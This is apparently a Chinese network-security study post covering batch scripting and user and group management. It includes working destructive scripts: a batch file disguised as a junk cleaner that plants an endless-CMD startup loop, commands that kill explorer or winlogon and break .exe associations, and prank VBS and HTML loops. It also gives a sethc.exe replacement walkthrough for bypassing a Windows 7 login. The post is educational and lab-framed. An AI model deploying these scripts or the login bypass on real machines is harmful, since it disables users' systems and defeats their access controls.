網安-02-批處理、病毒、使用者與組管理、破解系統密碼
目錄
批處理和病毒
第六章 使用者與組管理
破解系統密碼
批處理和病毒
目錄
初識批處理
一個簡單的批處理程式
1、引入
2、echo 輸出
3、變數
4、if、goto
病毒
簡單的批處理檔案一
簡單的批處理檔案二
最簡單的病毒
最簡單的病毒解藥
最簡單的指令碼
最簡單的死迴圈指令碼
整人網頁
初識批處理
- 如何批處理:
命名:.bat
方法:建立一個記事本檔案,然後將其擴充套件改為.bat
- 批處理作用:自上而下成批處理每一條DOS命令,直到執行到最後一條。
- 執行環境:當然是我們cmd了
迴歸我學過的任何一門語言都是從一個簡單的**程式開始的,批處理也同樣如此
一個簡單的批處理程式
1、引入
- d:
- cd\
- cd temp
- del ,/s/q
我們把幾條dos命令匯聚在一起,這就進入了批處理的範疇
2、echo 輸出
- color 0a
- title 飛哥小程式v1.0
- echo ==========================
- echo 選單
- echo 1、修改管理員密碼
- echo 2、定時關機
- echo 3、退出本程式
-
echo ===========================
- pause
看不懂?先不急,我們先來看一下執行效果:
@echo off #關閉回顯
color 0a #設定視窗顯示顏色
- color:
- 指定控制檯輸出的顏色屬性
- 顏色屬性由兩個十六進位制數字指定 -- 第一個為背景,第二個則為文字顏色。
- 每個數字可以為以下任何值之一:
- 0 = 黑色 8 = 灰色
- 1 = 藍色 9 = 淡藍色
- 2 = 綠色 A = 淡綠色
- 3 = 湖藍色 B = 淡淺綠色
-
4 = 紅色 C = 淡紅色
- 5 = 紫色 D = 淡紫色
- 6 = 黃色 E = 淡黃色
- 7 = 白色 F = 亮白色
- 例如: "cilor fc" 亮白色背景,淡紅色文字顏色。
title #設定程式名
例如:title 飛哥小程式v1.0
pause #暫停螢幕(沒有這條語句,我們是看不到上圖的顯示效果的,程式只會一閃而過)
3、變數
- color 0a
- title 飛哥小程式v1.0
- echo ==========================
- echo 選單
- echo 1、修改管理員密碼
- echo 2、定時關機
- echo 3、退出本程式
- echo ===========================
- set /p u=請輸入使用者名稱:
- set /p p=請輸入新密碼:
- net user %u% %p% >nul
- pause
同樣我們先來看下效果:
set /p u= (字串 ) #獲取輸入的字元,將其賦值給變數u
%u% #提取變數u的值
net user 使用者名稱 密碼 #修改賬戶密碼(windows所有平臺支援)
>nul #清除一條命令執行後系統反饋
再來看一下效果:
後面的“命令成功完成”就不見了!
4、if、goto
- @echo off
- color 0a
- title 飛哥小程式v1.0
- :menu
- cls
- echo ==========================
- echo 選單
- echo 1、修改管理員密碼
- echo 2、定時關機
- echo 3、退出本程式
- echo ===========================
- set /p num=您的選擇是:
- if "%num%"=="1" goto 1
- if "%num%"=="2" goto 2
- if "%num%"=="3" goto 3
- echo 被鬧,好好輸!
- pause
- goto menu
- :1
- set /p u=請輸入使用者名稱:
- set /p p=請輸入新密碼:
- net user %u% %p% >nul
- echo 您的密碼已經設定成功!
- pause
- goto menu
- :2
- set /p time=請輸入時間:
- shutdown -s -t %time%
- set /p x=是否取消(1:是,0:否):
- if "%x%"=="1" shutdown -a
- goto menu
- pause
- :3
- exit
分割槽塊
:menu
"menu"區塊
:1
“1”區塊
:2
“2”區塊
:3
"3"區塊
goto 區塊名 #程式跳該區塊
例如:goto menu #程式跳至“menu區塊”
if "%num%"=="1" 命令1 #如果條件成立,執行命令1;條件不成立,跳過命令1,向下走
cls #清屏
shutdown -s -t 100 #定時關機
- 常用shutdown命令:
- shutdown -a #取消關機
- shutdown -s #關機
- shutdown -f #強行關閉應用程式
- shutdown -l #登出當前使用者
- shutdown -r #關機並重啟
- shutdown -s -t 時間 #定時關機
- shutdown -h #休眠
- 更多的 cmd:
- shutdown ?
- 檢視
好了,通過我們以上所學的命令,這樣一個簡單的批處理程式就寫完了。
病毒
測試環境:虛擬機器win2003
注:一些簡單的病毒程式請勿在真實機中測試
簡單的批處理檔案一
功能:偽裝垃圾清理程式新增一個開機自啟動項,無限彈出CMD視窗
- @echo off
- title 系統垃圾清理
- color 2f
- echo =======若防毒軟體惡意攔截,請選擇【允許程式的所有操作】========
- echo.
- echo.
- echo :start>c:\windows\windows.bat
- echo start cmd>>c:\windows\windows.bat
- echo goto start>>c:\windows\windows.bat
- copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul
- if %errorlevel%==0 goto next
- copy c:\windows\windows.bat "%USERPROFILE%\「開始」選單\程式\啟動" >nul
- if %errorlevel%==1 goto error
- :next
- echo.
- echo.
- echo ====== 垃圾清理中,請不要關閉視窗======
- echo.
- ping -n 5 127.0.0.1 >nul
- echo.
- echo ====== 垃圾清理完畢,共清理垃圾500M===
- echo.
- echo.
- echo ====== 建議立即重啟電腦
- pause
- goto ex
- :error
- echo.
- echo.
- echo ====== 程式執行失敗,請使用【管理員許可權】重新執行!======
- echo.
- pause
- goto ex
- :ex
- exit
echo. #輸出一個空
注:系統啟動選單位置這裡是winxp和win2003的位置,至於win後續系統或其他系統,去問萬能的度娘
我們來看一下執行效果:
執行完成後我們可以看到在開始啟動項中多了一個windows.bat檔案。
重啟之後,電腦完全宕機了。
簡單的批處理檔案二
功能:偽裝垃圾清理程式強制終止桌面程序
- @echo off
- title 系統垃圾清理
- color 2f
- echo ====== 若有防毒軟體惡意攔截,請選擇【允許程式的所有操作】=====
- echo.
- echo.
- :next
- echo.
- echo.
- echo ====== 垃圾清理中,請不要關閉視窗=======
- echo.
- ping -n 5 127.0.0.1 >nul
- taskkill /im explorer.exe /f >nul 2>nul
- echo.
- echo. ===== 完了,你係統廢了======
- ping -n 5 127.0.0.1>nul
- echo.
- start c:\windows\explorer.exe
- echo.
- echo ====== 已經修復好了!是不是嚇壞了!!嘿嘿=========
- pause
>nul 2>nul 訊息全部遮蔽
詳細請訪問:https://blog.csdn.net/weixin_43252204/article/details/105394751
桌面程序被殺死!
桌面程序恢復:
最簡單的藍屏炸彈檔案
ntsd -c q -pn winlogon.ex
分析:
ntsd #殺死程序
ntsd -c q -pn 程序名 #強制殺死程序
藍屏原因:winlogon 程序不能被殺死,我想強制殺死,系統不讓,結果導致藍屏!
對win2003有很大的殺傷力,但對win2008基本沒有殺傷力
最簡單的病毒
assoc.exe=txtfile
分析:
修改檔案關聯,導致檔案無法正常開啟
測試效果:
最簡單的病毒解藥
assoc.exe=exefile
只需將檔案字尾與其關聯文對應即可
最簡單的指令碼
方法:將.txt改為.vbs
msgbox "我最帥!"
測試效果:
最簡單的死迴圈指令碼
- do
- msgbox "我最帥!"
- loop
測試:
效果:視窗無法關閉
解決方法:
vbs 使用微軟自帶的wscript.exe來編寫的
一個有趣的小指令碼,大家可以試試
- do
- msgbox "飛哥最帥!"
- msgbox "小子,你對這件事有異議嗎"
- msgbox "你要為此付出代價"
- msgbox "從現在開始我要求你點100下滑鼠"
- msgbox "100"
- msgbox "99"
- msgbox "98"
- msgbox "97"
- msgbox "96"
- msgbox "95"
- msgbox "94"
- msgbox "93"
- msgbox "92"
- msgbox "91"
- msgbox "90"
- msgbox "...."
- msgbox "3"
- msgbox "2"
- msgbox "1"
- msgbox "如果你看到這裡,說明你確實很執著,你感動了我,請再點一下"
- msgbox "年輕人,有時候執著也沒用,換個姿勢再來一次"
- loop
注:可以用修改圖示軟體修改vbs檔案圖示
整人網頁
- <html>
- <head>
- <meta charset="utf-8">
- <meta http-equiv="X-UA-Compatible" content="IE=edge">
- <title>很噁心的常見整人效果的程式碼</title>
- <link rel="stylesheet" href="">
- </head>
- <body>
- <a href="" onmouseover="alert('飛哥真帥');
- alert('飛哥真帥');
- alert('飛哥是真帥');
- alert('飛哥是真帥');
- alert('飛哥是真的帥');
- alert('同意不!');
- alert('不同意?');
- alert('去死吧');
- ">不許把滑鼠移到這裡!</a>點了真爽!!!
- </body>
- </html>
測試效果:
-
第六章 使用者與組管理
windows伺服器系統:win2000 win2003 win2008 win2012
linux伺服器系統:Redhat Centos
使用者管理
每個使用者有自己的唯一的SID(安全識別符號)
使用者SID
系統SID
windows 系統管理員administrator的UID是 500
普通使用者是1000 開始的
linux 系統管理員root 的UID是 0
普通使用者是1000開始
賬號密碼儲存的位置 :C:\windows\system32\config\SAM #暴力破解,撞庫
windows系統上,預設密碼最長有效期42天(尤其是伺服器系統)
內建賬戶
給人使用的:
administrator 管理員賬號
guest 來賓賬戶
計算機服務元件
system 系統賬戶,許可權至高無上
local services 本地服務賬戶 普通許可權
network services 網路服務賬戶 普通許可權
配置檔案
windows ”使用者“
賬戶dos命令
- net user
- net user 賬戶名 字串 #修改密碼
- net user 賬戶名 #檢視賬戶資訊
- net user 賬戶名 密碼 /add #新建賬戶
- net user 賬戶名 密碼 /del #刪除賬戶
- net user 賬戶名 /active:yes/no #啟用或禁用賬戶
組管理
組的作用:簡化許可權賦予
賦許可權方式:
1)使用者 - 組-賦許可權
2)使用者-賦許可權
內建組(系統自帶組)
內建組的許可權已經被系統賦予
- administrators #管理員組
- guests #來賓組
- users #普通使用者組
- network #網路配置組
- print #印表機組
- Remote Desktop #遠端桌面組
- net localgroup
- net localgroup 組名
- net localgroup 組名 /add
- net localgroup 組名 使用者名稱 /add
- net localgroup 組名 使用者名稱 /del
- net localgroup 組名 /del
伺服器遠端管理
圖形化遠端管理
執行 :“mstsc”
telnet(命令列)\
檢視本地上所有開放的埠 cmd “netstat -an”
telnet:23
遠端桌面協議RDP:3389
破解系統密碼
利用5次shift漏洞破解win7密碼
漏洞
漏洞1:未登陸系統前連按5次shift彈出程式c:\windows\system32\sethc.exe
漏洞2:部分win7及win10系統在未進入系統時,可以通過系統修復漏洞篡改系統檔名!
注:如果win7或win10已修補此漏洞2,則無法利用
破解過程相關知識
cmd工具路徑
c:\windows\system32\cmd
使用者/賬戶密碼儲存位置
c:\windows\system32\config\SAM
修改賬戶密碼;
netuser 使用者名稱 新密碼
[網路安全學習篇附]:利用5次shift漏洞破解win7密碼(詳)
目錄
實驗 利用5次shift漏洞破解win7密碼
漏洞
實驗環境:
準備
開始
實驗 利用5次shift漏洞破解win7密碼
漏洞
漏洞1:未登陸系統前連按5次shift彈出程式c:\windows\system32\sethc.exe
漏洞2:部分win7及win10系統在未進入系統時,可以通過系統修復漏洞篡改系統檔名!
只要是win7或win10存在這兩個漏洞,就可對其進行破解
實驗環境:
虛擬機器:VMware Workstation 15.5 pro
虛擬機器系統:
準備
1、設定賬戶密碼
開始
2、開機進入登入介面,(這裡滑鼠一定要點選到虛擬機器裡面去)連按shift鍵5次,彈出下面的對話方塊,說明存在5次shift漏洞,這個程式的位置:c:\windows\system32\sethc.exe
思路:用cmd視窗程式來替換這個程式
3、重啟,在這個介面下把電源拔了。
那麼我們在虛擬機器裡面如何拔電源呢
(開機如果未出現此介面,建議再拔電源一次,win7一般兩次,win10一般三次)進入修復介面,這裡 當然是選擇啟動修復了,我們利用的就是啟動修復的漏洞
點選取消
它會繼續嘗試修復
等待...
好了,我們想要的介面終於出來了,點選檢視問題詳細資訊
下拉至最後
進入我們記事本
我們選擇 檔案 -- 另存為 進入以下介面
點選進入,就到我們的C盤了
依次進入目錄:windows\system32
cmd程式和貼上鍵程式都在c:\windows\system32\cmd
5次shift漏洞的程式c:\windows\system32\sethc.exe
找到我們的5次shift漏洞的程式,將這個程式重新命名(改成什麼都可以,)
我們這裡重新命名成ssss
再找到我們的cmd程式
右鍵 -- 複製 -- 貼上 -- 形成一個cmd副本,將其重新命名為sethc
將其重新命名為sethc
好了,到這裡我們就基本上已經成功了。
關閉記事本,選擇 --取消 --重新啟動
回到我們的登出介面
這次再連按5次shift,我們的cmd視窗就被調出來了
再操作一波,用這個密碼登陸系統就可以了